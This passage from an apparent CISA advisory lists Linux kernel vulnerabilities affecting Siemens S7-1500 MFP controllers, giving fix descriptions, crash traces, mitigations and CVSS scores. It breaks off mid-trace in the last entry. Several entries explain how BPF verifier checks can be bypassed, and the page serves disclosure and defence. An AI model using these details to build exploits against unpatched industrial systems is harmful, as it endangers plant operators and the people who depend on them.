<p>In the Linux kernel, the following vulnerability has been resolved: net: dsa: improve shutdown sequence Alexander Sverdlin presents 2 problems during shutdown with the lan9303 driver. One is specific to lan9303 and the other just happens to reproduce there. The first problem is that lan9303 is unique among DSA drivers in that it calls dev_get_drvdata() at "arbitrary runtime" (not probe, not shutdown, not remove): phy_state_machine() -&gt; ... -&gt; dsa_user_phy_read() -&gt; ds-&gt;ops-&gt;phy_read() -&gt; lan9303_phy_read() -&gt; chip-&gt;ops-&gt;phy_read() -&gt; lan9303_mdio_phy_read() -&gt; dev_get_drvdata() But we never stop the phy_state_machine(), so it may continue to run after dsa_switch_shutdown(). Our common pattern in all DSA drivers is to set drvdata to NULL to suppress the remove() method that may come afterwards. But in this case it will result in an NPD. The second problem is that the way in which we set dp-&gt;conduit-&gt;dsa_ptr = NULL; is concurrent with receive packet processing. dsa_switch_rcv() checks once whether dev-&gt;dsa_ptr is NULL, but afterwards, rather than continuing to use that non-NULL value, dev-&gt;dsa_ptr is dereferenced again and again without NULL checks: dsa_conduit_find_user() and many other places. In between dereferences, there is no locking to ensure that what was valid once continues to be valid. Both problems have the common aspect that closing the conduit interface solves them. In the first case, dev_close(conduit) triggers the NETDEV_GOING_DOWN event in dsa_user_netdevice_event() which closes user ports as well. dsa_port_disable_rt() calls phylink_stop(), which synchronously stops the phylink state machine, and ds-&gt;ops-&gt;phy_read() will thus no longer call into the driver after this point. In the second case, dev_close(conduit) should do this, as per Documentation/networking/driver.rst: | Quiescence | ---------- | | After the ndo_stop routine has been called, the hardware must | not receive or transmit any data. All in flight packets must | be aborted. If necessary, poll or wait for completion of | any reset commands. So it should be sufficient to ensure that later, when we zeroize conduit-&gt;dsa_ptr, there will be no concurrent dsa_switch_rcv() call on this conduit. The addition of the netif_device_detach() function is to ensure that ioctls, rtnetlinks and ethtool requests on the user ports no longer propagate down to the driver - we're no longer prepared to handle them. The race condition actually did not exist when commit 0650bf52b31f ("net: dsa: be compatible with masters which unregister on shutdown") first introduced dsa_switch_shutdown(). It was created later, when we stopped unregistering the user interfaces from a bad spot, and we just replaced that sequence with a racy zeroization of conduit-&gt;dsa_ptr (one which doesn't ensure that the interfaces aren't up).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-49998">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-50014</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: fix access to uninitialised lock in fc replay path The following kernel trace can be triggered with fstest generic/629 when executed against a filesystem with fast-commit feature enabled: INFO: trying to register non-static key. The code is fine but needs lockdep annotation, or maybe you didn't initialize this object before use? turning off the locking correctness validator. CPU: 0 PID: 866 Comm: mount Not tainted 6.10.0+ #11 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-prebuilt.qemu.org 04/01/2014 Call Trace: dump_stack_lvl+0x66/0x90 register_lock_class+0x759/0x7d0 __lock_acquire+0x85/0x2630 ? __find_get_block+0xb4/0x380 lock_acquire+0xd1/0x2d0 ? __ext4_journal_get_write_access+0xd5/0x160 _raw_spin_lock+0x33/0x40 ? __ext4_journal_get_write_access+0xd5/0x160 __ext4_journal_get_write_access+0xd5/0x160 ext4_reserve_inode_write+0x61/0xb0 __ext4_mark_inode_dirty+0x79/0x270 ? ext4_ext_replay_set_iblocks+0x2f8/0x450 ext4_ext_replay_set_iblocks+0x330/0x450 ext4_fc_replay+0x14c8/0x1540 ? jread+0x88/0x2e0 ? rcu_is_watching+0x11/0x40 do_one_pass+0x447/0xd00 jbd2_journal_recover+0x139/0x1b0 jbd2_journal_load+0x96/0x390 ext4_load_and_init_journal+0x253/0xd40 ext4_fill_super+0x2cc6/0x3180 ... In the replay path there's an attempt to lock sbi-&gt;s_bdev_wb_lock in function ext4_check_bdev_write_error(). Unfortunately, at this point this spinlock has not been initialized yet. Moving it's initialization to an earlier point in __ext4_fill_super() fixes this splat.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-50014">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/457.html">CWE-457 Use of Uninitialized Variable</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-50063</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Prevent tail call between progs attached to different hooks bpf progs can be attached to kernel functions, and the attached functions can take different parameters or return different return values. If prog attached to one kernel function tail calls prog attached to another kernel function, the ctx access or return value verification could be bypassed. For example, if prog1 is attached to func1 which takes only 1 parameter and prog2 is attached to func2 which takes two parameters. Since verifier assumes the bpf ctx passed to prog2 is constructed based on func2's prototype, verifier allows prog2 to access the second parameter from the bpf ctx passed to it. The problem is that verifier does not prevent prog1 from passing its bpf ctx to prog2 via tail call. In this case, the bpf ctx passed to prog2 is constructed from func1 instead of func2, that is, the assumption for ctx access verification is bypassed. Another example, if BPF LSM prog1 is attached to hook file_alloc_security, and BPF LSM prog2 is attached to hook bpf_lsm_audit_rule_known. Verifier knows the return value rules for these two hooks, e.g. it is legal for bpf_lsm_audit_rule_known to return positive number 1, and it is illegal for file_alloc_security to return positive number. So verifier allows prog2 to return positive number 1, but does not allow prog1 to return positive number. The problem is that verifier does not prevent prog1 from calling prog2 via tail call. In this case, prog2's return value 1 will be used as the return value for prog1's hook file_alloc_security. That is, the return value rule is bypassed. This patch adds restriction for tail call to prevent such bypasses.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-50063">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/841.html">CWE-841 Improper Enforcement of Behavioral Workflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-50164</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix overloading of MEM_UNINIT's meaning Lonial reported an issue in the BPF verifier where check_mem_size_reg() has the following code: if (!tnum_is_const(reg-&gt;var_off)) /* For unprivileged variable accesses, disable raw * mode so that the program is required to * initialize all the memory that the helper could * just partially fill up. */ meta = NULL; This means that writes are not checked when the register containing the size of the passed buffer has not a fixed size. Through this bug, a BPF program can write to a map which is marked as read-only, for example, .rodata global maps. The problem is that MEM_UNINIT's initial meaning that "the passed buffer to the BPF helper does not need to be initialized" which was added back in commit 435faee1aae9 ("bpf, verifier: add ARG_PTR_TO_RAW_STACK type") got overloaded over time with "the passed buffer is being written to". The problem however is that checks such as the above which were added later via 06c1c049721a ("bpf: allow helpers access to variable memory") set meta to NULL in order force the user to always initialize the passed buffer to the helper. Due to the current double meaning of MEM_UNINIT, this bypasses verifier write checks to the memory (not boundary checks though) and only assumes the latter memory is read instead. Fix this by reverting MEM_UNINIT back to its original meaning, and having MEM_WRITE as an annotation to BPF helpers in order to then trigger the BPF verifier checks for writing to memory. Some notes: check_arg_pair_ok() ensures that for ARG_CONST_SIZE{,_OR_ZERO} we can access fn-&gt;arg_type[arg - 1] since it must contain a preceding ARG_PTR_TO_MEM. For check_mem_reg() the meta argument can be removed altogether since we do check both BPF_READ and BPF_WRITE. Same for the equivalent check_kfunc_mem_size_reg().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-50164">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-50298</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: enetc: allocate vf_state during PF probes In the previous implementation, vf_state is allocated memory only when VF is enabled. However, net_device_ops::ndo_set_vf_mac() may be called before VF is enabled to configure the MAC address of VF. If this is the case, enetc_pf_set_vf_mac() will access vf_state, resulting in access to a null pointer. The simplified error log is as follows. root@ls1028ardb:~# ip link set eno0 vf 1 mac 00:0c:e7:66:77:89 [ 173.543315] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000004 [ 173.637254] pc : enetc_pf_set_vf_mac+0x3c/0x80 Message from sy [ 173.641973] lr : do_setlink+0x4a8/0xec8 [ 173.732292] Call trace: [ 173.734740] enetc_pf_set_vf_mac+0x3c/0x80 [ 173.738847] __rtnl_newlink+0x530/0x89c [ 173.742692] rtnl_newlink+0x50/0x7c [ 173.746189] rtnetlink_rcv_msg+0x128/0x390 [ 173.750298] netlink_rcv_skb+0x60/0x130 [ 173.754145] rtnetlink_rcv+0x18/0x24 [ 173.757731] netlink_unicast+0x318/0x380 [ 173.761665] netlink_sendmsg+0x17c/0x3c8</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-50298">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-53124</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fix data-races around sk-&gt;sk_forward_alloc Syzkaller reported this warning: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 16 at net/ipv4/af_inet.c:156 inet_sock_destruct+0x1c5/0x1e0 Modules linked in: CPU: 0 UID: 0 PID: 16 Comm: ksoftirqd/0 Not tainted 6.12.0-rc5 #26 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:inet_sock_destruct+0x1c5/0x1e0 Code: 24 12 4c 89 e2 5b 48 c7 c7 98 ec bb 82 41 5c e9 d1 18 17 ff 4c 89 e6 5b 48 c7 c7 d0 ec bb 82 41 5c e9 bf 18 17 ff 0f 0b eb 83 &lt;0f&gt; 0b eb 97 0f 0b eb 87 0f 0b e9 68 ff ff ff 66 66 2e 0f 1f 84 00 RSP: 0018:ffffc9000008bd90 EFLAGS: 00010206 RAX: 0000000000000300 RBX: ffff88810b172a90 RCX: 0000000000000007 RDX: 0000000000000002 RSI: 0000000000000300 RDI: ffff88810b172a00 RBP: ffff88810b172a00 R08: ffff888104273c00 R09: 0000000000100007 R10: 0000000000020000 R11: 0000000000000006 R12: ffff88810b172a00 R13: 0000000000000004 R14: 0000000000000000 R15: ffff888237c31f78 FS: 0000000000000000(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffc63fecac8 CR3: 000000000342e000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ? __warn+0x88/0x130 ? inet_sock_destruct+0x1c5/0x1e0 ? report_bug+0x18e/0x1a0 ? handle_bug+0x53/0x90 ? exc_invalid_op+0x18/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? inet_sock_destruct+0x1c5/0x1e0 __sk_destruct+0x2a/0x200 rcu_do_batch+0x1aa/0x530 ? rcu_do_batch+0x13b/0x530 rcu_core+0x159/0x2f0 handle_softirqs+0xd3/0x2b0 ? __pfx_smpboot_thread_fn+0x10/0x10 run_ksoftirqd+0x25/0x30 smpboot_thread_fn+0xdd/0x1d0 kthread+0xd3/0x100 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x34/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 ---[ end trace 0000000000000000 ]--- Its possible that two threads call tcp_v6_do_rcv()/sk_forward_alloc_add() concurrently when sk-&gt;sk_state == TCP_LISTEN with sk-&gt;sk_lock unlocked, which triggers a data-race around sk-&gt;sk_forward_alloc: tcp_v6_rcv tcp_v6_do_rcv skb_clone_and_charge_r sk_rmem_schedule __sk_mem_schedule sk_forward_alloc_add() skb_set_owner_r sk_mem_charge sk_forward_alloc_add() __kfree_skb skb_release_all skb_release_head_state sock_rfree sk_mem_uncharge sk_forward_alloc_add() sk_mem_reclaim // set local var reclaimable __sk_mem_reclaim sk_forward_alloc_add() In this syzkaller testcase, two threads call tcp_v6_do_rcv() with skb-&gt;truesize=768, the sk_forward_alloc changes like this: (cpu 1) | (cpu 2) | sk_forward_alloc ... | ... | 0 __sk_mem_schedule() | | +4096 = 4096 | __sk_mem_schedule() | +4096 = 8192 sk_mem_charge() | | -768 = 7424 | sk_mem_charge() | -768 = 6656 ... | ... | sk_mem_uncharge() | | +768 = 7424 reclaimable=7424 | | | sk_mem_uncharge() | +768 = 8192 | reclaimable=8192 | __sk_mem_reclaim() | | -4096 = 4096 | __sk_mem_reclaim() | -8192 = -4096 != 0 The skb_clone_and_charge_r() should not be called in tcp_v6_do_rcv() when sk-&gt;sk_state is TCP_LISTEN, it happens later in tcp_v6_syn_recv_sock(). Fix the same issue in dccp_v6_do_rcv().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-53124">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-53170</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: block: fix uaf for flush rq while iterating tags blk_mq_clear_flush_rq_mapping() is not called during scsi probe, by checking blk_queue_init_done(). However, QUEUE_FLAG_INIT_DONE is cleared in del_gendisk by commit aec89dc5d421 ("block: keep q_usage_counter in atomic mode after del_gendisk"), hence for disk like scsi, following blk_mq_destroy_queue() will not clear flush rq from tags-&gt;rqs[] as well, cause following uaf that is found by our syzkaller for v6.6: ================================================================== BUG: KASAN: slab-use-after-free in blk_mq_find_and_get_req+0x16e/0x1a0 block/blk-mq-tag.c:261 Read of size 4 at addr ffff88811c969c20 by task kworker/1:2H/224909 CPU: 1 PID: 224909 Comm: kworker/1:2H Not tainted 6.6.0-ga836a5060850 #32 Workqueue: kblockd blk_mq_timeout_work Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x91/0xf0 lib/dump_stack.c:106 print_address_description.constprop.0+0x66/0x300 mm/kasan/report.c:364 print_report+0x3e/0x70 mm/kasan/report.c:475 kasan_report+0xb8/0xf0 mm/kasan/report.c:588 blk_mq_find_and_get_req+0x16e/0x1a0 block/blk-mq-tag.c:261 bt_iter block/blk-mq-tag.c:288 [inline] __sbitmap_for_each_set include/linux/sbitmap.h:295 [inline] sbitmap_for_each_set include/linux/sbitmap.h:316 [inline] bt_for_each+0x455/0x790 block/blk-mq-tag.c:325 blk_mq_queue_tag_busy_iter+0x320/0x740 block/blk-mq-tag.c:534 blk_mq_timeout_work+0x1a3/0x7b0 block/blk-mq.c:1673 process_one_work+0x7c4/0x1450 kernel/workqueue.c:2631 process_scheduled_works kernel/workqueue.c:2704 [inline] worker_thread+0x804/0xe40 kernel/workqueue.c:2785 kthread+0x346/0x450 kernel/kthread.c:388 ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:293 Allocated by task 942: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 ____kasan_kmalloc mm/kasan/common.c:374 [inline] __kasan_kmalloc mm/kasan/common.c:383 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:380 kasan_kmalloc include/linux/kasan.h:198 [inline] __do_kmalloc_node mm/slab_common.c:1007 [inline] __kmalloc_node+0x69/0x170 mm/slab_common.c:1014 kmalloc_node include/linux/slab.h:620 [inline] kzalloc_node include/linux/slab.h:732 [inline] blk_alloc_flush_queue+0x144/0x2f0 block/blk-flush.c:499 blk_mq_alloc_hctx+0x601/0x940 block/blk-mq.c:3788 blk_mq_alloc_and_init_hctx+0x27f/0x330 block/blk-mq.c:4261 blk_mq_realloc_hw_ctxs+0x488/0x5e0 block/blk-mq.c:4294 blk_mq_init_allocated_queue+0x188/0x860 block/blk-mq.c:4350 blk_mq_init_queue_data block/blk-mq.c:4166 [inline] blk_mq_init_queue+0x8d/0x100 block/blk-mq.c:4176 scsi_alloc_sdev+0x843/0xd50 drivers/scsi/scsi_scan.c:335 scsi_probe_and_add_lun+0x77c/0xde0 drivers/scsi/scsi_scan.c:1189 __scsi_scan_target+0x1fc/0x5a0 drivers/scsi/scsi_scan.c:1727 scsi_scan_channel drivers/scsi/scsi_scan.c:1815 [inline] scsi_scan_channel+0x14b/0x1e0 drivers/scsi/scsi_scan.c:1791 scsi_scan_host_selected+0x2fe/0x400 drivers/scsi/scsi_scan.c:1844 scsi_scan+0x3a0/0x3f0 drivers/scsi/scsi_sysfs.c:151 store_scan+0x2a/0x60 drivers/scsi/scsi_sysfs.c:191 dev_attr_store+0x5c/0x90 drivers/base/core.c:2388 sysfs_kf_write+0x11c/0x170 fs/sysfs/file.c:136 kernfs_fop_write_iter+0x3fc/0x610 fs/kernfs/file.c:338 call_write_iter include/linux/fs.h:2083 [inline] new_sync_write+0x1b4/0x2d0 fs/read_write.c:493 vfs_write+0x76c/0xb00 fs/read_write.c:586 ksys_write+0x127/0x250 fs/read_write.c:639 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x70/0x120 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x78/0xe2 Freed by task 244687: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 